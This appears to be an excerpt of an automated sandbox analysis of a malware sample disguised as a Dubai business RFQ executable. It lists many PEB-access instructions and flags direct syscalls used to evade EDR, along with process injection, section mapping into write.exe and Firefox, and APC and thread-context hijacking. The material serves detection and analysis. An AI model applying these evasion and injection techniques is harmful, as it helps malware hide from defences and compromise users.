Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01637425 mov ecx, dword ptr fs:[00000030h]	2_2_01637425
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168F42F mov eax, dword ptr fs:[00000030h]	2_2_0168F42F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168F42F mov eax, dword ptr fs:[00000030h]	2_2_0168F42F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168F42F mov eax, dword ptr fs:[00000030h]	2_2_0168F42F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168F42F mov eax, dword ptr fs:[00000030h]	2_2_0168F42F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168F42F mov eax, dword ptr fs:[00000030h]	2_2_0168F42F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F640D mov eax, dword ptr fs:[00000030h]	2_2_015F640D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF409 mov eax, dword ptr fs:[00000030h]	2_2_016BF409
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01696400 mov eax, dword ptr fs:[00000030h]	2_2_01696400
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01696400 mov eax, dword ptr fs:[00000030h]	2_2_01696400
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB420 mov eax, dword ptr fs:[00000030h]	2_2_015FB420
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016354E0 mov eax, dword ptr fs:[00000030h]	2_2_016354E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E4EF mov eax, dword ptr fs:[00000030h]	2_2_0163E4EF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E4EF mov eax, dword ptr fs:[00000030h]	2_2_0163E4EF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016064F0 mov eax, dword ptr fs:[00000030h]	2_2_016064F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A4F0 mov eax, dword ptr fs:[00000030h]	2_2_0163A4F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A4F0 mov eax, dword ptr fs:[00000030h]	2_2_0163A4F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF4FD mov eax, dword ptr fs:[00000030h]	2_2_016BF4FD
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016294FA mov eax, dword ptr fs:[00000030h]	2_2_016294FA
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016214C9 mov eax, dword ptr fs:[00000030h]	2_2_016214C9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016214C9 mov eax, dword ptr fs:[00000030h]	2_2_016214C9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016214C9 mov eax, dword ptr fs:[00000030h]	2_2_016214C9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016214C9 mov eax, dword ptr fs:[00000030h]	2_2_016214C9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016214C9 mov eax, dword ptr fs:[00000030h]	2_2_016214C9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162F4D0 mov eax, dword ptr fs:[00000030h]	2_2_0162F4D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016244D1 mov eax, dword ptr fs:[00000030h]	2_2_016244D1
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016244D1 mov eax, dword ptr fs:[00000030h]	2_2_016244D1
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016024A2 mov eax, dword ptr fs:[00000030h]	2_2_016024A2
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016024A2 mov ecx, dword ptr fs:[00000030h]	2_2_016024A2
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168D4A0 mov ecx, dword ptr fs:[00000030h]	2_2_0168D4A0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168D4A0 mov eax, dword ptr fs:[00000030h]	2_2_0168D4A0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168D4A0 mov eax, dword ptr fs:[00000030h]	2_2_0168D4A0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016344A8 mov eax, dword ptr fs:[00000030h]	2_2_016344A8
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E4BC mov eax, dword ptr fs:[00000030h]	2_2_0163E4BC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01600485 mov ecx, dword ptr fs:[00000030h]	2_2_01600485
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163648A mov eax, dword ptr fs:[00000030h]	2_2_0163648A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163648A mov eax, dword ptr fs:[00000030h]	2_2_0163648A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163648A mov eax, dword ptr fs:[00000030h]	2_2_0163648A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163B490 mov eax, dword ptr fs:[00000030h]	2_2_0163B490
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163B490 mov eax, dword ptr fs:[00000030h]	2_2_0163B490
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168C490 mov eax, dword ptr fs:[00000030h]	2_2_0168C490
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01612760 mov ecx, dword ptr fs:[00000030h]	2_2_01612760
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF75B mov eax, dword ptr fs:[00000030h]	2_2_015FF75B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641763 mov eax, dword ptr fs:[00000030h]	2_2_01641763
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641763 mov eax, dword ptr fs:[00000030h]	2_2_01641763
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641763 mov eax, dword ptr fs:[00000030h]	2_2_01641763
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641763 mov eax, dword ptr fs:[00000030h]	2_2_01641763
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641763 mov eax, dword ptr fs:[00000030h]	2_2_01641763
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01641763 mov eax, dword ptr fs:[00000030h]	2_2_01641763
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01630774 mov eax, dword ptr fs:[00000030h]	2_2_01630774
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01604779 mov eax, dword ptr fs:[00000030h]	2_2_01604779
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01604779 mov eax, dword ptr fs:[00000030h]	2_2_01604779
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01633740 mov eax, dword ptr fs:[00000030h]	2_2_01633740
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163174A mov eax, dword ptr fs:[00000030h]	2_2_0163174A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A750 mov eax, dword ptr fs:[00000030h]	2_2_0163A750
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01622755 mov eax, dword ptr fs:[00000030h]	2_2_01622755
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01622755 mov eax, dword ptr fs:[00000030h]	2_2_01622755
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01622755 mov eax, dword ptr fs:[00000030h]	2_2_01622755
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01622755 mov ecx, dword ptr fs:[00000030h]	2_2_01622755
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01622755 mov eax, dword ptr fs:[00000030h]	2_2_01622755
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01622755 mov eax, dword ptr fs:[00000030h]	2_2_01622755
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AE750 mov eax, dword ptr fs:[00000030h]	2_2_016AE750
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01629723 mov eax, dword ptr fs:[00000030h]	2_2_01629723
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB705 mov eax, dword ptr fs:[00000030h]	2_2_015FB705
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB705 mov eax, dword ptr fs:[00000030h]	2_2_015FB705
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB705 mov eax, dword ptr fs:[00000030h]	2_2_015FB705
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB705 mov eax, dword ptr fs:[00000030h]	2_2_015FB705
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160D700 mov ecx, dword ptr fs:[00000030h]	2_2_0160D700
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C970B mov eax, dword ptr fs:[00000030h]	2_2_016C970B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C970B mov eax, dword ptr fs:[00000030h]	2_2_016C970B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162270D mov eax, dword ptr fs:[00000030h]	2_2_0162270D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162270D mov eax, dword ptr fs:[00000030h]	2_2_0162270D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162270D mov eax, dword ptr fs:[00000030h]	2_2_0162270D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160471B mov eax, dword ptr fs:[00000030h]	2_2_0160471B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160471B mov eax, dword ptr fs:[00000030h]	2_2_0160471B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF717 mov eax, dword ptr fs:[00000030h]	2_2_016BF717
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E7E0 mov eax, dword ptr fs:[00000030h]	2_2_0162E7E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016037E4 mov eax, dword ptr fs:[00000030h]	2_2_016037E4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016037E4 mov eax, dword ptr fs:[00000030h]	2_2_016037E4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016037E4 mov eax, dword ptr fs:[00000030h]	2_2_016037E4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016037E4 mov eax, dword ptr fs:[00000030h]	2_2_016037E4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016037E4 mov eax, dword ptr fs:[00000030h]	2_2_016037E4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016037E4 mov eax, dword ptr fs:[00000030h]	2_2_016037E4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016037E4 mov eax, dword ptr fs:[00000030h]	2_2_016037E4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016077F9 mov eax, dword ptr fs:[00000030h]	2_2_016077F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016077F9 mov eax, dword ptr fs:[00000030h]	2_2_016077F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF7CF mov eax, dword ptr fs:[00000030h]	2_2_016BF7CF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016007A7 mov eax, dword ptr fs:[00000030h]	2_2_016007A7

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtOpenFile: Direct from: 0x77AA2CEC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtCreateFile: Direct from: 0x77AA2F0C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtQueryVolumeInformationFile: Direct from: 0x77AA2E4C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtDeviceIoControlFile: Direct from: 0x77AA2A0C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtProtectVirtualMemory: Direct from: 0x77A97A4E	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtAllocateVirtualMemory: Direct from: 0x77AA2B0C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtOpenSection: Direct from: 0x77AA2D2C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtQuerySystemInformation: Direct from: 0x77AA47EC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtNotifyChangeKey: Direct from: 0x77AA3B4C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtSetInformationProcess: Direct from: 0x77AA2B7C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtReadVirtualMemory: Direct from: 0x77AA2DAC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtAllocateVirtualMemory: Direct from: 0x77AA3BBC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtQueryInformationToken: Direct from: 0x77AA2BCC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtDelayExecution: Direct from: 0x77AA2CFC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtSetInformationThread: Direct from: 0x77A96319	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtReadFile: Direct from: 0x77AA29FC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtQuerySystemInformation: Direct from: 0x77AA2D1C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtAllocateVirtualMemory: Direct from: 0x77AA2B1C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtResumeThread: Direct from: 0x77AA35CC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtWriteVirtualMemory: Direct from: 0x77AA2D5C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtMapViewOfSection: Direct from: 0x77AA2C3C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtSetInformationThread: Direct from: 0x77AA2A6C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtQueryAttributesFile: Direct from: 0x77AA2D8C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtClose: Direct from: 0x77AA2A8C
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtCreateKey: Direct from: 0x77AA2B8C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtAllocateVirtualMemory: Direct from: 0x77AA480C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtProtectVirtualMemory: Direct from: 0x77AA2EBC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtWriteVirtualMemory: Direct from: 0x77AA482C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtQueryInformationProcess: Direct from: 0x77AA2B46	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtResumeThread: Direct from: 0x77AA2EDC	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtCreateUserProcess: Direct from: 0x77AA363C	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	NtOpenKeyEx: Direct from: 0x77AA2ABC	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Memory written: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: NULL target: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\write.exe

Thread register set: target process: 6004

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\write.exe

Thread APC queued: target process: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process created: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe "C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: nosimiokOMOHm.exe, 00000003.00000000.108995596123.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000003.00000002.113717186558.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113718550180.00000000018F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: nosimiokOMOHm.exe, 00000003.00000000.108995596123.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000003.00000002.113717186558.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113718550180.00000000018F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: nosimiokOMOHm.exe, 00000003.00000000.108995596123.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000003.00000002.113717186558.0000000001360000.00000002.00000001.00040000.00000000.sdmp, nosimiokOMOHm.exe, 00000005.00000002.113718550180.00000000018F0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: UProgram Manager*
